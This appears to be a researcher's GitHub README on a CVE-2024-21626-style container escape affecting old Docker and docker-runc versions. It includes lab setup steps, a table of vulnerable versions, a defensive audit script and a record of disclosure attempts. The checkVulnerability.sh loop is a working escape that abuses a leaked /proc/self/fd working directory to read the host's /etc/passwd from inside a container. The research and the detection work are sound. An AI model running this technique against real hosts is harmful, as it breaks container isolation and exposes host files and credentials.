# Container escape vulnerability in old runc components (CVE-2024-21626)
During my analysis of [CVE-2024-21626](https://sk3pper.github.io/posts/cve-2024-21626/playing-with-cve-2024-21626/) I found that other, older Docker components are also vulnerable to *fd leakage* (something not mentioned in the [security advisory GHSA-xr7r-f8xq-vfvv](https://github.com/advisories/GHSA-xr7r-f8xq-vfvv)). Read my full article for a detailed explanation [here](https://sk3pper.github.io/posts/cve-2024-21626/exploring-hidden-vulnerabilities-in-legacy-docker-versions/).
## 1. Setup environment
#### A. Download and install [Ubuntu 18.04.6 LTS (Bionic Beaver)](https://releases.ubuntu.com/18.04/)
During the installation, do not tick the box that downloads system updates.
#### B. Install the vulnerable Docker version and related components
- Go to https://download.docker.com/linux/static/stable/x86_64/ and download the old version ***docker-X.Y.Z-ce.tgz*** you want to test
- Extract it, copy the contents to `/usr/bin`, and start the Docker daemon.
```shell
cd Downloads/
tar xzvf <docker-X.Y.Z-ce.tgz>
sudo cp docker/* /usr/bin/
sudo dockerd &
```
#### C. Check the installed versions
```shell
sudo docker version
containerd --version
uname -r
```
Old versions ship `docker-runc` instead of `runc`, so check for it:
```shell
ls -la /usr/bin | grep docker
-rwxr-xr-x 1 root root 14128576 mar 19 10:54 docker
-rwxr-xr-x 1 root root 8932648 mar 19 10:54 docker-containerd
-rwxr-xr-x 1 root root 8381448 mar 19 10:54 docker-containerd-ctr
-rwxr-xr-x 1 root root 3047368 mar 19 10:54 docker-containerd-shim
-rwxr-xr-x 1 root root 39989264 mar 19 10:54 dockerd
-rwxr-xr-x 1 root root 772400 mar 19 10:54 docker-init
-rwxr-xr-x 1 root root 2534781 mar 19 10:54 docker-proxy
-rwxr-xr-x 1 root root 7092608 mar 19 10:54 docker-runc
ls -la /usr/bin | grep runc
-rwxr-xr-x 1 root root 10232 mar 18 2018 bdftruncate
-rwxr-xr-x 1 root root 7092608 mar 19 10:54 docker-runc
-rwxr-xr-x 1 root root 35000 gen 18 2018 runcon
-rwxr-xr-x 1 root root 39096 gen 18 2018 truncate
```
Check the version of **docker-runc/runc**:
```shell
runc --version
docker-runc -v
```
## 2. Check if the target is vulnerable and find the right fd
Run `checkVulnerability.sh` and see whether the contents of `/etc/passwd` are printed in the terminal:
```shell
#!/bin/bash
# checkVulnerability.sh: try each candidate fd number as the container's working
# directory and see whether the host's /etc/passwd is reachable through it
for i in {4..20}; do
    sudo docker run -it --rm -w /proc/self/fd/$i alpine:3.14.3 sh -c "tail /proc/self/cwd/../../../etc/passwd"
    echo ""
done
```
```shell
# clone CVE-2024-21626-old-docker-versions repository
git clone git@github.com:Sk3pper/CVE-2024-21626-old-docker-versions.git
# run checkVulnerability.sh
chmod +x checkVulnerability.sh
./checkVulnerability.sh
```
For this example I used the `docker-17.03.1-ce` version.
![check vulnerability & find fd](./images/check_target_vulnerability.png)
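As an added defensive example (not part of this repository's code), the script below looks for the two host-side symptoms of the check above: a container whose configured working directory has the `/proc/self/fd/N` shape that `checkVulnerability.sh` uses, and a process whose current directory resolves into `/run/runc/` or `/sys/fs/cgroup/` on the host. It assumes `readlink` is available and uses `docker inspect` only in `audit_docker_workdirs`; the function names and the optional proc-tree root argument (which lets the audit run against a constructed tree) are my own.

```shell
#!/bin/sh
# Added example, not part of the original repository.
# Assumptions: readlink(1) is available; docker(1) is only needed for audit_docker_workdirs.

# A working directory of the form /proc/self/fd/N or /proc/<pid>/fd/N is the shape the
# check above relies on; a legitimate image almost never sets one.
is_fd_workdir() {
    case "$1" in
        /proc/self/fd/[0-9]*|/proc/[0-9]*/fd/[0-9]*) return 0 ;;
        *) return 1 ;;
    esac
}

# Where a leaked descriptor lands on the host: runc's state directory for the old
# versions listed in this README, or cgroupfs for the upstream CVE-2024-21626.
is_host_leak_target() {
    case "$1" in
        /run/runc/*|/sys/fs/cgroup/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Walk a proc tree (default /proc) and print "<pid> <cwd>" for every process whose
# current directory points into one of those host paths. Passing another root lets the
# function run against a constructed tree of <pid>/cwd symlinks for testing.
audit_proc_cwd() {
    root=${1:-/proc}
    for d in "$root"/[0-9]*; do
        cwd=$(readlink "$d/cwd" 2>/dev/null) || continue
        if is_host_leak_target "$cwd"; then
            printf '%s %s\n' "${d##*/}" "$cwd"
        fi
    done
}

# Report every running container whose configured WorkingDir has the suspicious shape.
audit_docker_workdirs() {
    for id in $(docker ps -q); do
        wd=$(docker inspect --format '{{.Config.WorkingDir}}' "$id") || continue
        if is_fd_workdir "$wd"; then
            printf 'container %s has suspicious WorkingDir %s\n' "$id" "$wd"
        fi
    done
}

# Usage: ./audit_fd_leak.sh --scan   (run as root to read other users' cwd links)
if [ "${1:-}" = "--scan" ]; then
    audit_proc_cwd
    audit_docker_workdirs
fi
```

Processes whose cwd points into `/run/runc/` are worth investigating on any host running the versions in the tables below: a normally started container never has a working directory there.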
## 3. Try the exploit
For this example I used the `docker-17.03.1-ce` version.
![exploit](./images/exploit.png)
## 4. Test Results
Below are the results of my analysis, organized by Docker version and the associated runc version used.
### docker-runc
| Docker Version | docker-runc version | Leaked fd number |
| ------------- |:-------------:| :-------------: |
| docker-17.03.1-ce.tgz | 1.0.0-rc2 | /proc/self/fd/4 |
| docker-17.03.2-ce.tgz | 1.0.0-rc2 | /proc/self/fd/4 |
| docker-17.06.0-ce.tgz | 1.0.0-rc3 | /proc/self/fd/5 |
| docker-17.06.1-ce.tgz | 1.0.0-rc3 | /proc/self/fd/5 |
| docker-17.06.2-ce.tgz | 1.0.0-rc3 | /proc/self/fd/5 |
| docker-17.09.0-ce.tgz | 1.0.0-rc4+dev | /proc/self/fd/5 |
| docker-17.09.1-ce.tgz | 1.0.0-rc4+dev | /proc/self/fd/5 |
| docker-17.12.0-ce.tgz | 1.0.0-rc4+dev | none |
| docker-17.12.1-ce.tgz | 1.0.0-rc4+dev | none |
| docker-18.03.0-ce.tgz | | none |
| docker-18.06.3-ce.tgz | 1.0.0-rc5+dev | none |
### runc
| Docker Version | runc version | Leaked fd number |
| ------------- |:-------------:| :-------------: |
| docker-18.09.0.tgz | 1.0.0-rc5+dev | none |
Here are the screenshots showing the three different vulnerable versions.
1.0.0-rc2 | 1.0.0-rc3 | 1.0.0-rc4+dev
:-------------------------:|:-------------------------: |:-------------------------:
![1.0.0-rc2 ](./images/17.03.1-1.0.0-rc2-fd4.png) | ![1.0.0-rc3](./images/17.06.0-1.0.0-rc3-fd5.png) | ![1.0.0-rc4](./images/17.09.1-1.0.0-rc4-fd5.png)
As with [CVE-2024-21626](https://sk3pper.github.io/posts/cve-2024-21626/playing-with-cve-2024-21626/), the different types of attacks are still possible.
## 5. Conclusion & Takeaways
This vulnerability is quite different from [CVE-2024-21626](https://sk3pper.github.io/posts/cve-2024-21626/playing-with-cve-2024-21626/) because:
1. It can be triggered on **older Linux versions** that lack the `openat2` syscall.
2. The leaked file descriptor is located under `/run/runc/<container>/`, which holds the state of running containers, rather than under the host's `/sys/fs/cgroup` directory.
What I discovered is that older versions are also vulnerable to the ***same attack technique***. Although the vulnerability itself differs, the result is the same: **gaining access to the host filesystem**. The key takeaway is not to rely solely on security advisories: test everything thoroughly. Fully understand the CVE and how it works, experiment with it in a safe environment, and explore edge cases.
## 6. Responsible disclosure
I tried to contact `security@docker.com` and `security@opencontainers.org`, and tried to have a `CVE` assigned. I received the following replies:
| Request | Reply |
| ------------- |:-------------|
| security@docker.com (19/03/24) | The versions you have listed are all EOL versions of software (~7 years old) and are no longer patched or maintained by Docker. If you have a concern about the versions or wording listed in the existing GHSA-xr7r-f8xq-vfvv advisory ("affected versions: >= 1.0.0-rc93, <= 1.1.11"), then the correct channel to report it should be to the OCI security mailbox: https://github.com/opencontainers/.github/blob/main/SECURITY.md Thank you for reaching out. Let us know if there is anything else we can do |
| security@opencontainers.org (20/03/24) | no response |
| CVE-MITRE (15/05/2024) |We normally do not assign CVE IDs to issues that exist only in release candidates. https://vulners.com/cve/CVE-2024-21626 had affected released versions of runc, such as release 1.1.11.|